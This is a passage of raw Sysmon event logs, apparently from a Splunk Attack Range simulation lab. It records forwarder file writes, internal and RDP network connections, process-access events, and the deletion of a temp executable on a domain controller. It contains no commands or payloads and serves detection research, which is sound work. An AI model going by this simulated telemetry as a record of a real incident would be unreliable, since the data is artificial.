AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32012FFF1F4D16053354AB939EF9F758,SHA256=8F99C4B0C1689A42087A05A6074D51C2553AC969D2855EDA8492F06FE714139A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219737Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:35.079{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A193F9B24FC6F9A0AFC3B5BF760B7ED,SHA256=D982759F98970E6450CB6F0217A70A753A5D7AE163E1ABA9F510BF58EC6DFA1B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219736Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:32.572{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51538-false10.0.1.12-8000- 23542300x8000000000000000295645Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:36.385{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4B78A3617461A3775C55FF88B59279F,SHA256=E553E2F296E539C003BA5E6C5F56C9A100E0C917669C4CBEFAF8A1D2A91FB48F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219740Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:36.877{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=104E2D18652F419723213EF292F9D8FC,SHA256=12E778376D386A5327A74787127A171311224762844FAC846C5C05FFE8A68CA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219739Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:36.079{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4683115809FE49D9F30274910839691C,SHA256=7F1A133E3E45E37564C1C7A569C6DC0298C6A5135D6BFC3C8BB85ABF67D200B5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219738Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:33.282{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx64245-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000295647Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:37.400{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28323648352FEC8ED0758D30B7A59231,SHA256=1133CC65A422BFF7049526C31155B49B60DCFA85624CED45E244394DB27A48B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219741Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:37.080{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E889E0F21AFC51E1A3AC6516D87368D3,SHA256=6D6085BDC4FA4BC7B3080AE43E4AF03D6626EF4BE437C79DE0455E8779C7A469,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295646Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:34.539{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49255-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000295648Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:38.431{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=313FE866BCC826D1074DF835AEBDA939,SHA256=70D4174EB574410BB5AC302FBF45117E0F071AB40C6E453AB0F14F1D790DE579,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219742Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:38.080{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=850B86A9AC8A69AA3CFA0FA06B0ED451,SHA256=AB3D7D8C76EBD12660B76B8F2BEAFF8720CFB8F0D6D373E54E4F46E8E3C1825C,IMPHASH=00000000000000000000000000000000falsetrue 534500x8000000000000000295650Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:39.599{C8EA50B7-1560-6216-CA06-000000003802}6984C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 23542300x8000000000000000295649Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:39.446{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BE3420BFDE86111CC5C87FE73B546E5,SHA256=4795CF1FD0A4585C9419FCFC37AB5522B3837C1F5FDD5E60F54AB96D9F47CBA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219743Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:39.081{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DB6CFB10B7197AC70012688E6975952,SHA256=FDC668FAD7F71E5EDBF560BD9BD83112AE24C43BA51427049EB5E1BDFD8B5E9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295652Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:40.465{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E5C53986433051168810E3777B7EBB4,SHA256=AB281BD0D9831D9E8F442BFA1214D2390DF72C94A8A2A6B61268516425574162,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219746Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:40.628{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8AFDB9371ABCC060325E8593A3535DC8,SHA256=7C489E1810AAC6601AADA15214C8DBB39B27EDACDFE504E919944FBDBF81858D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219745Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:40.081{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D479D6083F5E46AF10C1D6D3C4647DA,SHA256=FACA5D3DD7C14449E4282BCF3ECB27D4239A00343673210D639064F4BA32577F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295651Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:40.215{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219744Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:37.569{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx63023-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000295654Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:41.540{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-150MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295653Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:41.499{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4547A360186ADDDAC521C63E602249F4,SHA256=F453F95A566F57211ABE42ABB4F527250A81459F58A1E6B56CE71C412221DE8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219748Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:41.082{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B94DFE57F052F8DFD6EE4B80E7C480F6,SHA256=A3E5E59F214E73E284F0060815BB33E6D3EA3B71113643D44C03A625F7CBB5BE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219747Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:38.499{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51539-false10.0.1.12-8000- 23542300x8000000000000000295660Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:42.629{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=6A1D886EFADE8003ED25F944E5FD69D0,SHA256=A868AE30FF6C78887EC136FF416784D4223DC6C32D13BFE85B703AD8D3E3618D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295659Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:42.629{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=BA3611D87B368E97ADF16B64D8975258,SHA256=CBEA2E9466B9198F60B423B7038A7560F05DD2ADAA232767E6ACC174109959F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295658Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:42.547{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-151MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295657Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:42.514{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=384713110DF84FF451F974ADDF90A518,SHA256=1AB0AAD204BED267DFBCDFC773ACC2C73C2452694104104DB5E9EBBEA478115B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219749Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:42.082{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F92B7B3376459B503D45537A43B8EB62,SHA256=DCC277D713B82FDD05F1E324915A73B18F79879F7144E326D62B850D435D5525,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295656Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:39.688{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49258-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x8000000000000000295655Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:39.557{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49257-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000295661Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:43.515{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CAC09CEF8317E4CBF51E47E60786807,SHA256=79D6E2EF985F9971A3A239FFC9B74F2FCBA1A1A0A91313429F54FCF908876136,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219750Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:43.083{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E7A986B5DF6398D8F9F0B301BD1CD69,SHA256=35A0A0FE4B3456F28CEE5669F89F3045E33943438812E6E472718A613752F557,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295662Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:44.530{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FCDA7C8AE6D20123D420AF9C4EBD11B,SHA256=BB7A85322B99EE38173B0D5C423F4A34C3DD0ABA29B365F0074992086EFE6660,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000219766Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:44.551{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1580-6216-D004-000000003902}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000219765Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:44.551{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F79D7C3151A2996350C7E370FCC48DE2,SHA256=16BCB99C27FC6E6D7FE2247B92C73423EE64C822BFC736552156ECDAA4FAA57D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000219764Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:44.551{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219763Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:44.551{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219762Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:44.551{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219761Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:44.551{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219760Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:44.551{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219759Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:44.551{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219758Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:44.551{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219757Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 